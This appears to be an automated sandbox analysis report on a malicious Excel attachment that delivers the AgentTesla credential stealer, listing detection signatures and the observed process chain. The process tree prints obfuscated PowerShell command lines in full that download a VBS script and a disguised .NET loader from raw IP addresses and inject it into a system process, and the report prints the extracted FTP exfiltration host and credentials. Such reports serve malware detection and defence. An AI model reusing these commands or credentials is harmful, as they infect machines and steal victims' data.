Windows Analysis Report
Cuentas bancarias y cdigo ##Swift incorrecto.xla.xlsx
Overview
General Information
Detection
AgentTesla
Field | Value |
---|---|
Score | 100 |
Range | 0 - 100 |
Whitelisted | false |
Confidence | 100% |
Signatures
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected AgentTesla
Yara detected Powershell download and execute
Yara detected obfuscated html page
.NET source code contains potential unpacker
.NET source code references suspicious native API functions
Check if machine is in data center or colocation facility
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Contains functionality to log keystrokes (.Net Source)
Document exploit detected (process start blacklist hit)
Excel sheet contains many unusual embedded objects
Injects a PE file into a foreign processes
Installs new ROOT certificates
Machine Learning detection for sample
Microsoft Office drops suspicious files
Obfuscated command line found
PowerShell case anomaly found
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: File With Uncommon Extension Created By An Office Application
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Script Initiated Connection to Non-Local Network
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious Microsoft Office Child Process
Sigma detected: WScript or CScript Dropper
Suspicious command line found
Suspicious execution chain found
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Checks if the current process is being debugged
Compiles C# or VB.Net code
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected potential crypto function
Document contains embedded VBA macros
Document embeds suspicious OLE2 link
Document misses a certain OLE stream usually present in this Microsoft Office document type
Drops PE files
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Excel Network Connections
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Script Initiated Connection
Sigma detected: Suspicious DNS Query for IP Lookup Service APIs
Sigma detected: Suspicious Office Outbound Connections
Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer
Yara signature match
Classification
- System is w7x64
- EXCEL.EXE (PID: 1704, cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, MD5: D53B85E21886D2AF9815C377537BCAC3)
- mshta.exe (PID: 1100, cmdline: C:\Windows\System32\mshta.exe -Embedding, MD5: 95828D670CFD3B16EE188168E083C3C5)
- cmd.exe (PID: 540, cmdline: "C:\Windows\system32\cmd.exe" "/C poWersHEll -ex bYPAsS -nOp -W 1 -C deVIcEcrEDENtiAlDePlOyMenT.ExE ; Iex($(IEX('[SYsTEm.tExt.EncODIng]'+[chAr]58+[CHaR]0X3a+'uTf8.GetSTRInG([SySteM.CONVErT]'+[ChaR]58+[Char]58+'fRomBaSe64StrINg('+[CHAr]0X22+'JHlsc0ozTHU3NyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURELXRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRW1CRXJkRWZpTml0SW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJsTU9OLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBwaW1GQ1NhWCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEYsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjSFhoVEtzcnBILHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFlLUSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEdGKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInZTcElNclJ2SXpVIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbUVTcEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgU3puVSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJHlsc0ozTHU3Nzo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5OC40Ni4xNzguMTQ0L2V2ZW5pbmdmaWxlZGF0aW5nbG92ZXIudmJzIiwiJEVOdjpBUFBEQVRBXGV2ZW5pbmdmaWxlZGF0aW5nbG92ZXIudkJTIiwwLDApO3N0QXJULXNMZUVQKDMpO3N0YVJ0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVudjpBUFBEQVRBXGV2ZW5pbmdmaWxlZGF0aW5nbG92ZXIudkJTIg=='+[chAR]34+'))')))", MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
- powershell.exe (PID: 2988, cmdline: poWersHEll -ex bYPAsS -nOp -W 1 -C deVIcEcrEDENtiAlDePlOyMenT.ExE ; Iex($(IEX('[SYsTEm.tExt.EncODIng]'+[chAr]58+[CHaR]0X3a+'uTf8.GetSTRInG([SySteM.CONVErT]'+[ChaR]58+[Char]58+'fRomBaSe64StrINg('+[CHAr]0X22+'JHlsc0ozTHU3NyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURELXRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRW1CRXJkRWZpTml0SW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJsTU9OLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBwaW1GQ1NhWCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEYsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjSFhoVEtzcnBILHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFlLUSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEdGKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInZTcElNclJ2SXpVIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbUVTcEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgU3puVSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJHlsc0ozTHU3Nzo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5OC40Ni4xNzguMTQ0L2V2ZW5pbmdmaWxlZGF0aW5nbG92ZXIudmJzIiwiJEVOdjpBUFBEQVRBXGV2ZW5pbmdmaWxlZGF0aW5nbG92ZXIudkJTIiwwLDApO3N0QXJULXNMZUVQKDMpO3N0YVJ0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVudjpBUFBEQVRBXGV2ZW5pbmdmaWxlZGF0aW5nbG92ZXIudkJTIg=='+[chAR]34+'))')))", MD5: A575A7610E5F003CC36DF39E07C4BA7D)
- csc.exe (PID: 3160, cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\cboglgly\cboglgly.cmdline", MD5: 23EE3D381CFE3B9F6229483E2CE2F9E1)
- cvtres.exe (PID: 3172, cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESC2C3.tmp" "c:\Users\user\AppData\Local\Temp\cboglgly\CSC66221087E6254F6E92E0F9138CFEC2C1.TMP", MD5: C877CBB966EA5939AA2A17B6A5160950)
- wscript.exe (PID: 3264, cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\eveningfiledatinglover.vBS", MD5: 045451FA238A75305CC26AC982472367)
- powershell.exe (PID: 3324, cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "(('Y0ulink = xR'+'mhttp://91.92.254.194/imge/new-image_v.jpg'+'xRm; Y0uwebC'+'lient = New-Object System.Net.WebClient; try { Y0udownlo'+'adedData '+'= Y0uwebClient.DownloadD'+'ata(Y0ulink) } catch { Write-'+'Host xRmFailed To download data from Y0ulinkxRm -ForegroundC'+'olor Red; exit }; if (Y0udownloadedData -ne Y0unull) { Y0uima'+'geText = [System.T'+'ext'+'.Encoding'+']::UTF8.'+'GetString(Y0udownloadedData); Y0ustartFlag = xRm<<B'+'ASE64_START>>xRm; Y0uendFlag = xRm<<BASE64_EN'+'D>>xRm; Y0ustartIndex = Y0uimageText.IndexOf(Y0ustartFlag); Y0uendIn'+'dex = Y0uimageText.IndexOf(Y0uendFlag); if (Y0ustartIndex -ge '+'0'+' -and Y0uendInd'+'ex -gt Y0'+'ustartInde'+'x) { Y0ustartIndex += Y0ustartFlag.Length; Y0ubase64Lengt'+'h = Y0uendIndex - Y0ustartIndex; Y0ubase'+'64Command = Y0uimageText.Su'+'bstring(Y0ustartIndex, Y0ubase64Length); Y0ucommandBytes = [System.Convert]::FromBase64String(Y0ubase64Command); Y0uloadedAssembly = [System.Reflec'+'tion.Assem'+'bly]::L'+'oad(Y0ucommandBytes); Y0utype = Y0uloadedAssembly.GetType(xRm'+'RunPE.Hom'+'exRm); Y0umethod = Y0utype'+'.GetMethod(xRmV'+'AIx'+'Rm).Invoke(Y0unull, [object[]] (xRmtxt.44'+'46sabbbbbbbewmadam/441.871.64.891//:ptthxRm , xRmdesativadoxRm , xRmdesativadoxRm , xRm'+'desativadox'+'Rm,xRmAddInProcess32xRm,xRmxRm)) } }') -rePlacE 'xRm',[ChAR]39 -rePlacE ([ChAR]89+[ChAR]48+[ChAR]117),[ChAR]36)|IEX", MD5: A575A7610E5F003CC36DF39E07C4BA7D)
- AddInProcess32.exe (PID: 3440, cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe", MD5: EFBCDD2A3EBEA841996AEF00417AA958)
- cleanup
Name | Description | Attribution | Blogpost URLs | Link |
---|---|---|---|---|
Agent Tesla, AgentTesla | A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel. | | | |
{"Exfil Mode": "FTP", "Host": "ftp://ftp.fosna.net", "Username": "madamweb@fosna.net", "Password": "=A+N^@~c]~#I"}
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_Obshtml | Yara detected obfuscated html page | Joe Security | | |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security | ||
JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security | ||
JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security | ||
JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security | ||
JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security | ||
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security | ||
JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security | ||
JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security | ||
INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID | Detects executables referencing Windows vault credential objects. Observed in infostealers | ditekSHen | | |
MALWARE_Win_AgentTeslaV2 | AgenetTesla Type 2 Keylogger payload | ditekSHen | | |
System Summary |
---|
Source: | Author: Florian Roth (Nextron Systems): |